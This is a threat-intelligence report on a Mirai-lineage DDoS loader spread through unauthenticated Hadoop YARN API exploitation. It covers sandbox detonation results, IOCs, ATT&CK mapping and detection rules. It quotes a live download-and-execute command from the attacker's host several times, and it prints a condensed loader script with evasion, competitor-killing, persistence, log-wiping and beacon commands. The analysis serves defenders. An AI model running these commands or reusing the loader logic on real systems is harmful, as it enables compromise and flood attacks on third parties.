TLP:CLEAR

MICROC2 — cross-platform botnet loader

Mass Hadoop YARN RCE exploitation wave delivering a Mirai-lineage cross-platform loader, with confirmed live C2 tasking and a volumetric flood attack observed in sandbox

Published 2026-07-03 Source Distributed SSH/Telnet Honeypot Fleet Confidence MEDIUM Classification Mirai-Lineage / Cross-Platform DDoS Loader

Executive summary

One IP hit six of our sensors twice in under two hours through an unauthenticated Hadoop API endpoint most defenders have never had reason to think about. The loader it planted didn't just sit there. We put the payload in a sandbox and watched it stay in contact with its command server for days, taking orders six separate times and cycling through four different attack techniques.

Key Finding
On 2026-06-18, our distributed honeypot fleet observed a mass exploitation wave against the unauthenticated Hadoop YARN ResourceManager REST API (port 8088), hitting six geographically distinct sensors in two sub-waves roughly 105 minutes apart. Every exploited node was instructed to run the identical one-liner wget -qO- http://ssh.microc2.lol/static/js/chunk.sh | sh. This loader fingerprints the target architecture, including Android and rooted-device paths, then fetches a matching cross-platform ELF payload and installs it with sandbox evasion, multi-vector persistence, and anti-forensic cleanup. We detonated the x86_64 payload in a sandbox, first for 12 hours and then for an extended 72 hours. Both runs confirmed a live, actively-tasked command-and-control channel. Across them, the C2 ordered the bot into six separate volumetric floods against six unrelated third-party hosts, using four distinct attack techniques: a TCP garbage-payload flood (twice), a high-intensity raw UDP flood, a malformed/flagless TCP connection-flood, and a legitimate SYN-flag connection-flood (twice).

VirusTotal community data (queried 2026-07-03) shows the C2 domain was registered 2026-05-24, about four weeks before this exploitation wave, and is already flagged malicious by 9 of 91 engines. The C2 IP itself carries a negative community reputation and was independently re-scanned by VirusTotal multiple times in the days following our sandbox detonation (most recently 2026-07-03 09:06 UTC). That's active, concurrent tracking by the wider security community, even though we found no named public write-up of this specific campaign. The captured binary sample itself had never previously been submitted to VirusTotal. We submitted it as part of this investigation; engine results are pending.

6
Sensors Exploited
11
Exploit Events
2
Attack Sub-Waves
9/91
VT Domain Detections
10/91
VT C2-IP Detections
6
Confirmed Flood Attacks
4
Attack Techniques

Threat actor profile

No named threat actor or public campaign write-up was found matching this loader's tradecraft, C2 domain, or binary-naming convention. The operator has not been attributed.

Tooling Assessment
The loader implements real evasion (VM/container detection), competitor eviction, cross-platform+Android targeting, multi-vector persistence (cron, rc.local, init.d, systemd), and anti-forensic log/history cleanup — a genuinely complete feature set. However, the placeholder binary name baked into the loader's architecture-detection logic (sdfjgnjsdf.<arch>) reads as an unedited builder default rather than deliberate branding, and the fake systemd unit is copy-paste boilerplate ("Network Time Sync"). This is consistent with a mid-tier, semi-mature operator running an off-the-shelf or lightly-customized Mirai-derivative builder rather than bespoke development.
AttributeAssessmentConfidence
Motivation DDoS capability / DDoS-for-hire — confirmed volumetric flood capability, no crypto-mining or credential-theft behavior observed HIGH
Sophistication Intermediate — complete evasion/persistence/anti-forensics feature set and at least four independently-triggerable attack modules (TCP garbage-payload flood, raw UDP flood, malformed/flagless TCP connection-flood, legitimate SYN-flag connection-flood), but generic/unedited artifacts suggest a builder, not custom engineering HIGH
Attribution Unknown; no named threat actor or public research found MED
Target profile Opportunistic, exploit-driven — Internet-wide scanning for unauthenticated Hadoop YARN REST APIs, payload targets Linux (x86/x86_64/MIPS/ARM/PPC/SH4) and rooted Android devices HIGH
Operational tempo Single confirmed exploitation wave against our fleet (2026-06-18, two sub-waves ~105 min apart), but the C2 itself stayed active for days afterward — see Sandbox Detonation below for the full attack-by-attack breakdown HIGH

Infrastructure analysis

Exploit source ────────── Hadoop YARN RCE, port 8088
Single source IP (2 sub-waves, 6 sensors) ──→ am-container-spec.commands.command injection
wget -qO- http://ssh.microc2.lol/static/js/chunk.sh | sh
ssh.microc2.lol (loader stage)
Sandbox/container evasion → arch fingerprint
fetches sdfjgnjsdf.<arch> from same host
installs (cron/rc.local/init.d/systemd) → self-deletes
94.154.43.46
:80 (initial GET /proxies.txt → 404)
:1337 (persistent raw-TCP C2, ~60s heartbeat)
:8080 (post-run beacon check-in)
34-byte C2 command push (T+51min)
bot → 96 connections, garbage-payload flood
target 1 (AS16276, OVH SAS):25568
14.2 MB delivered, 0 bytes returned
34-byte C2 command push (T+11h13m)
bot → garbage-payload flood, ports 22 + 1
target 2 (AS214833, Novi Sad):22,1
10.4 MB delivered, 0 bytes returned
33-byte C2 command push (72h re-run, T+~2h)
bot → raw one-way UDP flood
target 3 (AS11504, Cloud Minders):80/udp
13.2 MB delivered in 10.01s, 0 bytes returned
32-byte C2 command push (72h re-run, T+~6h16m)
bot → malformed/flagless TCP connection-flood
target 4 (AS215925, Vpsvault.host):22
3,400 crafted packets, every one RST'd by target
29-byte C2 command push (72h re-run, T+~7h24m)
bot → legitimate SYN connection-flood
target 5 (AS201279, Loginov Vladislav):22
320 SYNs, every one RST'd cleanly by target
32-byte C2 command push (72h re-run, T+~7h30m, same session)
bot → same technique, second target
target 6 (AS214833, Novi Sad — same as target 2):22
48 SYNs, every one RST'd cleanly by target

Exploitation wave (2026-06-18)

Timestamp (UTC)SensorVector
15:20:58Sensor AHadoop YARN RCE, port 8088
15:24:38Sensor BHadoop YARN RCE, port 8088
15:24:44Sensor CHadoop YARN RCE, port 8088
15:25:50Sensor DHadoop YARN RCE, port 8088
15:28:11Sensor EHadoop YARN RCE, port 8088
15:28:18Sensor FHadoop YARN RCE, port 8088
17:05:49Sensor BHadoop YARN RCE, port 8088 (repeat)
17:05:53Sensor CHadoop YARN RCE, port 8088 (repeat)
17:07:00Sensor DHadoop YARN RCE, port 8088 (repeat)
17:09:30Sensor EHadoop YARN RCE, port 8088 (repeat)
17:09:37Sensor FHadoop YARN RCE, port 8088 (repeat)

All 11 events carried the identical shell command. The 105-minute gap between the first and second sub-wave, hitting five of the same six sensors again, suggests either a retry pass by the same scanning infrastructure or a second thread of the same scan-and-exploit tool working through an overlapping target list.

Two separate things, not to be confused
The "(repeat)" rows in the table above are confirmed attacker traffic: same source IP, same day, a second sub-wave 105 minutes after the first. This callout is about something else entirely. In the weeks after that attack, our fleet's own loader-URL re-check cycle (roughly weekly, unrelated to the table above) independently re-fetched the same loader URL twice more, on 2026-06-25 and 2026-07-02, producing a distinct file hash each time because the served content is server-side templated. Those later fetches are our infrastructure re-validating a known indicator, not the attacker returning. We're flagging it because the timestamps alone, out of context, could be misread as sustained attacker interest.

Command and control

Confirmed Active C2
94.154.43.46 — confirmed live via sandbox detonation. Port 80 served an initial GET /proxies.txt request (404, Apache/2.4.6 CentOS banner). Port 1337 carried a persistent raw-TCP session with the bot, exchanging 1–2 byte heartbeats roughly every 60 seconds from check-in. WHOIS attributes the netblock to a Kharkiv, Ukraine-based reseller; VirusTotal flags the IP 8 malicious / 2 suspicious of 91 engines with a reputation score of −1, and it was independently re-scanned by VirusTotal multiple times in the days following our detonation (most recently 2026-07-03 09:06 UTC).
IP / DomainRolePort(s)VT DetectionsNotes
ssh.microc2.lol Loader + payload host 80 9 / 91 Registered 2026-05-24; Cloudflare-fronted; PublicDomainRegistry.com
94.154.43.46 C2 / same host as loader 80, 1337, 8080 8m + 2s / 91 Reputation −1; re-scanned by VT repeatedly since our detonation (most recently 2026-07-03 09:06 UTC)

Malware analysis

Loader script

POSIX shell, ~4.5 KB. Performs, in order: sandbox/container evasion (checks /proc/version for "microsoft", /proc/vz, /.dockerenv — exits silently if any match), competitor-process eviction by name, target-architecture detection (including Android markers /system/bin/linker[64]), payload download, process masquerading, four-vector persistence installation, log/history cleanup, and self-deletion.

Payload binary

ArchitectureFilenameNotes
x86_64sdfjgnjsdf.x86_64Detonated in sandbox — see below
x86sdfjgnjsdf.x86Not yet detonated
ARM (v4–v7)sdfjgnjsdf.arm[5|6|7]Not yet detonated
MIPS / MIPSelsdfjgnjsdf.mips / .mpslNot yet detonated
PPC / SuperHsdfjgnjsdf.ppc / .sh4Not yet detonated
VirusTotal — File Hash
The detonated x86_64 binary had never previously been submitted to VirusTotal, a fully novel sample as of first capture. We submitted it for analysis as part of this investigation (VT report); engine results are pending. A local heuristic pass against known family markers returned no confident match, which isn't enough to assign a named lineage beyond the generic Mirai-derivative behavioral pattern described throughout this report.

Static binary analysis

UPX-Packed
The x86_64 payload is packed with UPX 3.94, confirmed by literal packer strings embedded in the file and by entropy analysis (7.98 of 8.0 bits/byte on the packed body, consistent with compressed data). This explains why raw string extraction on the packed file returns high-entropy noise instead of readable content. Unpacking (upx -d) recovers a statically-linked, symbol-stripped ELF consistent with a musl-libc-style build: self-contained syscall stubs and a self-contained DNS resolver, unlike glibc's NSS-dependent static binaries. It goes from 64,392 bytes packed to 171,672 bytes unpacked.

Disassembling the unpacked binary confirms it implements networking via direct Linux syscalls rather than higher-level libc socket APIs — consistent with the minimal-footprint, hand-rolled style typical of Mirai-derivative flooders. The relevant syscall wrapper functions were located and verified against their actual Linux x86-64 syscall numbers:

; objdump -d (unpacked, UPX-stripped) -- socket() wrapper, verified syscall #41 (0x29)
  4149f8:  53                    push   %rbx
  4149f9:  48 63 d2              movslq %edx,%rdx
  4149fc:  48 63 f6              movslq %esi,%rsi
  4149ff:  48 63 ff              movslq %edi,%rdi
  414a02:  b8 29 00 00 00        mov    $0x29,%eax     ; 41 = __NR_socket
  414a07:  0f 05                 syscall

; connect() wrapper, verified syscall #42 (0x2a)
  41485c:  53                    push   %rbx
  41485d:  89 d2                 mov    %edx,%edx
  41485f:  48 63 ff              movslq %edi,%rdi
  414862:  b8 2a 00 00 00        mov    $0x2a,%eax     ; 42 = __NR_connect
  414867:  0f 05                 syscall

The same technique confirmed bind (#49), accept (#43), recvfrom (#45), recvmsg (#47), sendmsg (#46), sendto (#44), setsockopt/getsockopt (#54/#55), and shutdown (#51) all present as real, callable code — a full raw-socket toolkit, not just the subset we happened to observe in two sandbox runs. socket() is the single most-called function in the entire binary (48 call sites), consistent with a bot that opens many short-lived connections rather than reusing one.

Static analysis also turned up a capability we have not observed used: a full DNS-resolution routine (IPv4 and IPv6 aware, port 53, retry logic with randomized transaction IDs), musl's standard hostname-resolution machinery. Every C2 interaction we've captured uses the hardcoded IP 94.154.43.46 directly, so this is dormant capability, not active behavior. It means the operator could redirect the botnet to a new C2 by simply changing a resolvable hostname in a future build, without needing to patch this networking logic.

Limits of This Analysis
We were not able to isolate the specific function that parses an incoming C2 command byte and dispatches into the TCP-flood vs. UDP-flood code paths. The binary is stripped of symbols and the call graph runs 430+ functions deep through generic I/O/polling infrastructure; confidently isolating the dispatch logic without symbol-recovery tooling or dynamic tracing during a live attack would need substantially more time than static analysis alone can reasonably justify here.

Domain intelligence — microc2.lol

AttributeValue
VT detections9 / 91
Reputation0
Created2026-05-24
Last VT analysis2026-07-03
RegistrarPDR Ltd. d/b/a PublicDomainRegistry.com
NameserversCloudflare (vin.ns.cloudflare.com, ariella.ns.cloudflare.com)
WHOIS registrantLikely-fabricated identity — registrant name, Chicago IL street address, and contact email at a throwaway domain with a numeric-suffixed username; not privacy-proxied at the registrar level, but not attributable either

The domain's creation date (2026-05-24) falls roughly four weeks before the exploitation wave against our fleet — consistent with infrastructure stood up specifically to support this campaign rather than long-lived, reused C2.

Sandbox detonation

We ran the x86_64 payload twice: a 12-hour window first, then a 72-hour re-run once it was clear the C2 was still handing out orders. Between the two runs the bot got tasked six times against six different targets, cycling through four distinct attack techniques (one of them repeated back-to-back against two targets in the same session). We also missed one of the early attacks while it was happening — caught it only on a full pcap review after the fact, a mistake documented below alongside how we changed our monitoring afterward.

Live C2 + Repeated Tasking Confirmed
The payload was detonated in an isolated QEMU sandbox with outbound network access. It booted, ran, and connected to 94.154.43.46 within seconds each time, and a persistent heartbeat channel on port 1337 was established immediately and remained active throughout both runs. This is an actively operated C2, not dormant or abandoned infrastructure.

12-hour run — attack #1

Roughly 51 minutes after check-in (~20:18 UTC), the C2 pushed a 34-byte command, the first payload larger than a routine 1–2 byte heartbeat observed on that channel. The bot began attacking a third-party target roughly 55 milliseconds later. Full TCP stream reassembly of the resulting traffic shows the bot opened 96 connections to target 1 (AS16276, OVH SAS):25568 over roughly three minutes. Each connection sent a fake GET / HTTP/1.1 request with a Host: localhost header (likely a template/decoy artifact rather than a functional HTTP client), followed by high-entropy binary data in chunks up to 1460 bytes. Across the full attack window, 100% of application payload flowed from the bot to the target (14.2 MB across 17,218 TCP segments); the target never sent data back beyond bare TCP acknowledgments. This is a garbage-payload / bandwidth-exhaustion flood, not an HTTP request-rate flood. A second, identical 34-byte command arrived 34 seconds after the first, within the same attack window.

12-hour run — attack #2

Second Target, ~10 Hours Later
Roughly 11 hours 13 minutes after check-in (~06:40 UTC the following day), the C2 tasked the bot a second time, against a different target entirely. The bot attempted connections to target 2 (AS214833, PR Obrada Podataka Castles Novi Sad) on two ports. Port 22 (SSH) drew 1,683 SYN packets: 500 distinct connection attempts, each retried ~3x by the bot's own TCP stack. Every one of those 500 attempts eventually drew a TCP reset from the target, but in a single synchronized batch starting 1m14s after the first attempt, not immediately, which points to a stateful firewall or rate-limiter rather than a silently-dropping service. Port 1 (tcpmux) answered immediately and received the same garbage-flood technique as Attack #1: a 71-byte decoy HTTP header followed by high-entropy binary chunks, with heavy retransmission of the header itself (up to 258x for a single connection). That retransmission pattern again points to the target's connection-tracking state misbehaving under load rather than a clean one-way flood. Over roughly 6 minutes, the bot pushed 12,725 data segments (10.4 MB, 0 bytes returned) across 29,441 total packets on the two ports combined, a larger episode than Attack #1 by both packet count and duration.
MetricAttack #1Attack #2
Time to tasking~51 min from check-in~11h13m from check-in
TargetAS16276 (OVH SAS), port 25568AS214833 (Novi Sad), ports 22 + 1
Duration~3 minutes (96 connections)~6 minutes (29,441 packets)
Data delivered14.2 MB / 17,218 segments10.4 MB / 12,725 segments
Data returned by target0 bytes (ACKs only)0 bytes (ACKs only)

Outside these two windows, the C2 channel carried only routine heartbeat traffic (1–2 bytes, ~60s interval) and occasional short bursts of small (1–4 byte) protocol chatter with no associated external connections, likely status/sync exchanges rather than tasking. No DNS traffic was observed at any point in the 12-hour run; the bot uses a hardcoded C2 IP throughout.

MetricValue
boot / login / exectrue / true / true
exit_kindkilled (normal timeout reap at full 12h budget, not a crash)
C2 channels observed80 (initial fetch), 1337 (persistent), 8080 (beacon)
Attack commands observed2 distinct tasking events, 2 different targets
Total pcap captured29.9 MB
DNS queries0

72-hour re-run — attack #3: a different technique

New Attack Type — Raw UDP Flood
To see whether the C2 would keep issuing commands, we detonated the same x86_64 payload a second time with the observation window extended to 72 hours. Roughly 2 hours into this run, the C2 pushed a 33-byte command, and this time the bot's response was categorically different from the first two attacks. Instead of opening TCP connections and pushing garbage payload data, the bot fired a sustained one-way UDP flood: 9,036 packets of 1,458 bytes each, from a single fixed source port to a single fixed destination port, with zero responses expected or observed (UDP has no handshake). Total volume was 13.2 MB delivered in 10.01 seconds, a burst rate far higher than either TCP-based attack, both of which took minutes to deliver comparable volume. This confirms the payload carries at least two independently-triggerable attack modules, not just one flood routine reused against different targets.
MetricValue
Time to tasking~2 hours from check-in
TargetAS11504 (The Cloud Minders, Inc.), port 80/udp
TechniqueRaw UDP flood — fixed src/dst port, one-way, no handshake
Duration10.01 seconds
Data delivered13.2 MB / 9,036 packets (1,458 B each)
Peak rate~1.3 MB/s — highest bandwidth of all six attacks by far

72-hour re-run — attack #4: a third technique

New Attack Type — Malformed/Flagless TCP Connection-Flood
Roughly 6 hours 16 minutes into the same 72-hour run, the C2 pushed a 32-byte command on the port 1337 channel. 15 milliseconds later the bot began a third distinct attack pattern. Rather than pushing bulk payload data (Attacks #1/#2) or a sustained one-way UDP stream (Attack #3), the bot fired 3,400 individually-crafted TCP packets from 3,400 distinct source ports to target 4 on port 22 (SSH) over roughly 5 seconds. Each packet carried TCP options normally only seen on a SYN (MSS, SACK-permitted, timestamps, window scale), but the flags byte itself was entirely zero, meaning no control bits were set, not even SYN. That could be a deliberate evasion technique built to slip past naive SYN-flood detection, or it could be a packet-crafting bug in a raw-socket flood module. Either way, it's a distinct code path from the other two techniques. The target answered every one of the 3,400 attempts with a TCP reset, for 6,800 packets and roughly 398 KB total: a tiny fraction of Attacks #1–3's data volume, consistent with a connection/state-exhaustion attempt against a specific service rather than a bandwidth flood.
MetricValue
Time to tasking~6h16m from check-in
TargetAS215925 (Vpsvault.host Ltd), port 22/tcp
TechniqueMalformed/flagless crafted TCP packets, one per source port — no SYN bit set despite SYN-only options
Duration~5 seconds
Data delivered~398 KB / 6,800 packets (3,400 sent + 3,400 RST replies)
Peak rate~680 packets/sec — a connection-attempt flood, not a bandwidth flood

72-hour re-run — attacks #5 and #6: a fourth technique, two targets back to back

New Attack Type — Legitimate SYN Connection-Flood
Roughly 7 hours 24 minutes into the 72-hour run, the C2 pushed a 29-byte command on the port 1337 channel. 67 milliseconds later the bot began a fourth distinct attack pattern: a real SYN-flag connection-flood, using properly-formed TCP packets rather than the flagless variant from Attack #4. It fired 320 connection attempts from 320 distinct source ports to target 5 on port 22 (SSH), and the target answered every single one immediately with a clean TCP reset — no delay, no batching, unlike Attack #2's misbehaving target. The window ran about 3 minutes 20 seconds. Roughly 6 minutes 33 seconds after that first push, on the same C2 session, a second 32-byte command tasked the bot against a different target: 48 connection attempts to target 6, also on port 22, also answered immediately and individually with a clean reset. Both attacks total under 400 packets combined and deliver essentially no payload bytes; like Attack #4, this reads as a connection/state-exhaustion technique rather than a bandwidth flood, but unlike Attack #4 it uses textbook TCP semantics instead of a malformed packet. Notably, target 6 sits on the same hosting provider (AS214833, PR Obrada Podataka Castles Novi Sad) as Attack #2's target — the second time this C2 has directed traffic at that same provider.
MetricAttack #5Attack #6
Time to tasking~7h24m from check-in~7h30m from check-in (6m33s after Attack #5's push)
TargetAS201279 (Loginov Vladislav), port 22/tcpAS214833 (Novi Sad — same provider as Attack #2), port 22/tcp
TechniqueLegitimate SYN-flag connection-flood, one connection attempt per source port, target resets each individually and immediately
Duration~3m20s~1m46s
Data delivered320 SYNs + 320 RST replies (640 packets)48 SYNs + 48 RST replies (96 packets)

Target fingerprints

AttributeTarget 1 (Attack #1)Target 2 (Attack #2)Target 3 (Attack #3)Target 4 (Attack #4)Target 5 (Attack #5)Target 6 (Attack #6)
Port(s)2556822, 180/udp222222
ASNAS16276AS214833AS11504AS215925AS201279AS214833
Hosting providerOVH SASPR Obrada Podataka Castles Novi SadThe Cloud Minders, Inc.Vpsvault.host LtdLoginov VladislavPR Obrada Podataka Castles Novi Sad (same as Target 2)
VT detections0 / 91 (IP withheld)0 / 91 (IP withheld)3m + 1s / 91 (IP withheld)5m + 5s / 91 (IP withheld)0 / 91 (IP withheld)0 / 91 (IP withheld)
Last VT analysis2025-05-15 (stale — not actively tracked as malicious)Never previously scannedSame day as attack, ~10h priorSame day as attack, ~16.5h priorSame day as attack, ~3h20m prior~3 months prior (stale)
Our own scanPassive-only, 0 open ports foundNot yet scannedNot yet scannedNot yet scannedNot yet scannedNot yet scanned

Targets 1, 2, 5, and 6 show no VirusTotal detections and, apart from Target 6's stale scan, no recent history — consistent with incidental targets rather than known-malicious infrastructure. Targets 3 and 4 are the exceptions: both already carry multiple VT detections, last analyzed within a day of our observed attacks. That means either the community was already tracking these IPs as suspicious, or the C2 preferentially selected targets already flagged for unrelated reasons. Target 6 is also notable for a different reason: it sits on the exact same hosting provider (AS214833) as Target 2, the only repeat provider across all six targets — everything else sits on unrelated ASNs in different countries, which argues against any of them being the same actor's own infrastructure. It's more consistent with arbitrary DDoS-for-hire targets tasked by whoever controls this C2. IPs withheld; ports and hosting details retained for defenders correlating against their own logs.

Observed TTPs — MITRE ATT&CK

Exploit Public-Facing Application
Unauthenticated Hadoop YARN ResourceManager REST API, port 8088
Unix Shell
Command injected via YARN am-container-spec.commands.command
Ingress Tool Transfer
wget fetch of loader script and architecture-specific payload
Virtualization/Sandbox Evasion: System Checks
Checks for WSL, OpenVZ, Docker before running
Obfuscated Files or Information: Software Packing
Payload binary is UPX-packed; entropy 7.98/8.0 bits/byte on the packed body
Process Discovery
Enumerates running processes to find named competitors
Service Stop
Kills named competitor malware processes before installing
Masquerading: Masquerade Task or Service
Copies to .ntpd; fake systemd unit "Network Time Sync"
Scheduled Task/Job: Cron
crontab @reboot persistence
Create/Modify System Process: Systemd Service
Fake ntpd.service unit, enabled + started
Indicator Removal: Clear Command History
Clears HISTFILE, bash/zsh/sh history
Indicator Removal: Clear Logs
Deletes /var/log/auth.log, /var/log/secure
Indicator Removal: File Deletion
Loader self-deletes (rm -f "$0") after execution
Non-Application Layer Protocol
Persistent raw-TCP C2 channel on port 1337
Network Denial of Service: Direct Flood
Six confirmed live floods in sandbox (14.2 MB + 10.4 MB TCP garbage-payload; 13.2 MB raw UDP; ~398 KB malformed-TCP connection-flood; two legitimate SYN connection-floods) against six unrelated targets, across two detonation runs

Activity timeline

2026-05-24
C2 domain microc2.lol registered via PublicDomainRegistry.com, fronted by Cloudflare.
2026-06-18 15:20–15:28 UTC
First exploitation sub-wave — Hadoop YARN RCE against 6 honeypot sensors, identical loader command on each.
2026-06-18 17:05–17:09 UTC
Second exploitation sub-wave, ~105 minutes later, hitting 5 of the same 6 sensors.
2026-06-25 / 2026-07-02
Our fleet's own re-validation cycle re-fetches the loader URL (not new attacker activity); distinct file hashes returned each time due to server-side templating.
2026-07-02 19:07 UTC
x86_64 payload manually retrieved for sandbox analysis; confirmed never previously submitted to VirusTotal.
2026-07-02 19:12–19:17 UTC
Initial 5-minute detonation confirms live C2 on 94.154.43.46 (ports 80 and 1337).
2026-07-02 19:27 UTC
Extended 12-hour sandbox dwell launched for deeper behavioral observation.
2026-07-02 ~20:18 UTC (51 min into dwell)
C2 pushes first attack command; bot begins volumetric flood against target 1 (AS16276, OVH SAS):25568 roughly 55 milliseconds later.
2026-07-02 ~20:19 UTC
Second identical command arrives 34 seconds later; flood continues through the same ~3-minute window (96 connections, 14.2 MB total).
2026-07-02 / 2026-07-03
VirusTotal independently re-scans the C2 IP multiple times in the days following our detonation (most recently 2026-07-03 09:06 UTC), indicating active, ongoing community tracking rather than a one-off historical flag.
2026-07-03 (report first published)
Draft published while the dwell was still running, based on data through this point. C2 channel had been heartbeat-only since the first attack.
2026-07-03 ~06:40–06:47 UTC (11h13m into dwell)
C2 tasks the bot a second time, against an unrelated target on a different ASN. Bot attempts port 22 (1,683 SYNs, delayed batch of resets) and port 1 (succeeds immediately); garbage flood delivers 10.4 MB over ~6 minutes, 29,441 total packets — larger than the first attack. This activity fell inside a window where live monitoring had shifted to alive-only polling and was only discovered on full pcap review after the run completed.
2026-07-03 07:27 UTC
12-hour dwell completes normally (exit_kind: killed, full exec-time budget used). Final pcap: 29.9 MB. Report updated with both confirmed attacks.
2026-07-03 08:32 UTC
Same payload re-detonated in a fresh sandbox instance, this time with the observation window extended to 72 hours, to see whether the C2 kept issuing commands.
2026-07-03 ~10:31 UTC (~2h into the 72h run)
C2 pushes a 33-byte command; bot responds with a categorically different attack — a 10-second raw UDP flood (13.2 MB, 9,036 packets) against a third, unrelated target.
2026-07-03 ~14:48 UTC (~6h16m into the 72h run)
C2 pushes a 32-byte command; bot responds with a third distinct technique — a ~5-second flood of 3,400 malformed/flagless crafted TCP packets against port 22 on a fourth, unrelated target.
2026-07-03 ~15:56 UTC (~7h24m into the 72h run)
C2 pushes a 29-byte command; bot responds with a fourth distinct technique — a legitimate, properly-formed SYN connection-flood (320 attempts, port 22) against a fifth, unrelated target, each attempt answered immediately with a clean reset.
2026-07-03 ~16:03 UTC (~7h30m into the 72h run, 6m33s after the previous push)
Same C2 session pushes a second 32-byte command; bot repeats the SYN connection-flood technique (48 attempts, port 22) against a sixth target — on the same hosting provider as Attack #2's target.

Exploit payload

Hadoop YARN ResourceManager unauthenticated RCE (port 8088)

The Hadoop YARN ResourceManager REST API, when exposed without authentication, allows any client to submit a new "application" whose launch-context command is executed by the ResourceManager itself. This is a long-documented misconfiguration (not a CVE-numbered vulnerability) that has been mass-exploited since at least 2018 by botnets including DemonBot and various Mirai derivatives. The captured payload delivery command:

wget -qO- http://ssh.microc2.lol/static/js/chunk.sh | sh

was observed injected via the standard YARN new-application submission flow (/ws/v1/cluster/apps/new-application/ws/v1/cluster/apps, with the command embedded in am-container-spec.commands.command), identical across all 11 captured events.

Loader behavior summary

# Sandbox/container evasion — exits silently if any match
grep -qi "microsoft" /proc/version || [ -d /proc/vz ] || [ -f /.dockerenv ]

# Competitor eviction (not self)
kill -9 $(ps | grep -E '(zaksmdfasdf|sora|vmlinuz|moe|dota|x86_64|bash.mips)' | grep -v $$ | awk '{print $1}')

# Architecture fingerprint incl. Android
[ -f /system/bin/linker64 ] && echo "sdfjgnjsdf.arm7"   # Android
[ -f /lib64/ld-linux-x86-64.so.2 ] && echo "sdfjgnjsdf.x86_64"
# ...case fallback on `uname -m` for mips/mpsl/ppc/spc/m68k/sh4/arm[4-7]

# Fetch + masquerade
wget/curl/tftp "$BASEURL/$binary" -O "$binary"
cp "$binary" ".ntpd"; "./.ntpd" "$binary" &

# Persistence — crontab, rc.local, init.d, systemd (fake "Network Time Sync")
# Anti-forensics — clear HISTFILE, bash/zsh/sh history, auth.log/secure
# Self-delete: rm -f "$0"
# Beacon: wget -qO- "http://$SRV:8080/+?arch=$binary"

Indicators of compromise

Network IOCs

C2 / Loader Host
94.154.43.46
Ports 80, 1337 (persistent C2), 8080 (beacon)
C2 Domain
microc2.lol / ssh.microc2.lol
Created 2026-05-24, Cloudflare-fronted
Payload URL
http://ssh.microc2.lol/static/js/chunk.sh
Loader script; server-side templated per fetch
Payload URL Pattern
http://94.154.43.46/static/js/sdfjgnjsdf.<arch>
Per-architecture ELF payload
Observed Attack Target #1
IP withheld · port 25568
AS16276 (OVH SAS) · received the first volumetric flood
Observed Attack Target #2
IP withheld · ports 22, 1
AS214833 (Novi Sad) · received the second volumetric flood, ~10h later
Observed Attack Target #3
IP withheld · port 80/udp
AS11504 (The Cloud Minders, Inc.) · received a raw UDP flood in a follow-up 72h detonation
Observed Attack Target #4
IP withheld · port 22/tcp
AS215925 (Vpsvault.host Ltd) · received a malformed/flagless TCP connection-flood, ~6h16m into the same 72h run
Observed Attack Target #5
IP withheld · port 22/tcp
AS201279 (Loginov Vladislav) · received a legitimate SYN connection-flood, ~7h24m into the same 72h run
Observed Attack Target #6
IP withheld · port 22/tcp
AS214833 (Novi Sad, same provider as Target 2) · received a legitimate SYN connection-flood, ~7h30m into the same 72h run
Beacon Pattern
GET /+?arch=<binary>
Port 8080, post-installation check-in

File IOCs

SHA256FilenameTypeVT Status
6abf0b2cfee342e686454b83371b2148bcecbd7a1c453a08468fa41a9713264a sdfjgnjsdf.x86_64 ELF 64-bit LSB executable, x86-64, UPX-packed Pending

Filesystem artifacts

On-Device Artifacts
.ntpd — masquerade copy of the payload binary in the working directory
/etc/systemd/system/ntpd.service — fake unit, description "Network Time Sync"
/etc/init.d/ntpd — SysV-style persistence on systems without systemd
Outbound TCP to 94.154.43.46 on ports 80, 1337, or 8080
Cleared or truncated /var/log/auth.log, /var/log/secure, or shell history with no corresponding legitimate admin action

Mitigations and detection

ActionPriorityDetail
Disable unauthenticated YARN REST API HIGH Never expose Hadoop YARN ResourceManager (port 8088) to the Internet without authentication. Enable Kerberos or restrict to a trusted internal network.
Block C2 infrastructure HIGH Block outbound traffic to 94.154.43.46 and DNS resolution of microc2.lol at the perimeter.
Hunt for masquerading persistence MED Audit systemd units and init scripts named ntpd against the real NTP daemon's expected binary path and behavior.
Monitor for cleared logs MED Alert on unexpected truncation of auth.log/secure or shell history clearing outside maintenance windows.

Detection signatures

# Suricata/Snort — YARN RCE exploitation attempt
alert http any any -> $HOME_NET 8088 (msg:"MICROC2 Hadoop YARN unauthenticated RCE attempt"; \
  content:"am-container-spec"; http_client_body; \
  content:"microc2.lol"; http_client_body; \
  flow:established,to_server; sid:9920001; rev:1;)

# Suricata/Snort — loader payload delivery
alert http any any -> any any (msg:"MICROC2 loader download"; \
  content:"/static/js/chunk.sh"; http_uri; \
  content:"microc2.lol"; http_header; \
  flow:established,to_server; sid:9920002; rev:1;)

# Suricata — outbound C2 beacon
alert tcp $HOME_NET any -> 94.154.43.46 [80,1337,8080] (msg:"MICROC2 C2 beacon"; \
  flow:established,to_server; sid:9920003; rev:1;)

Collection methodology

All data in this report was collected organically by a distributed SSH/Telnet honeypot fleet deployed across multiple cloud providers and geographic regions. Fleet nodes also run alternate-protocol lure daemons that capture exploitation attempts against commonly-targeted services beyond SSH/Telnet, including the unauthenticated Hadoop YARN REST API used in this campaign.

The payload was fetched by the fleet's automated pipeline shortly after first capture and again at later dates as part of routine indicator re-validation. The x86_64 sample was detonated in an isolated sandbox environment with network egress routed through a residential-style VPN for realistic network conditions; no interaction with victim networks occurred beyond passive observation of traffic the sample itself generated. VirusTotal domain, IP, and file lookups were performed via the fleet's own investigation tooling.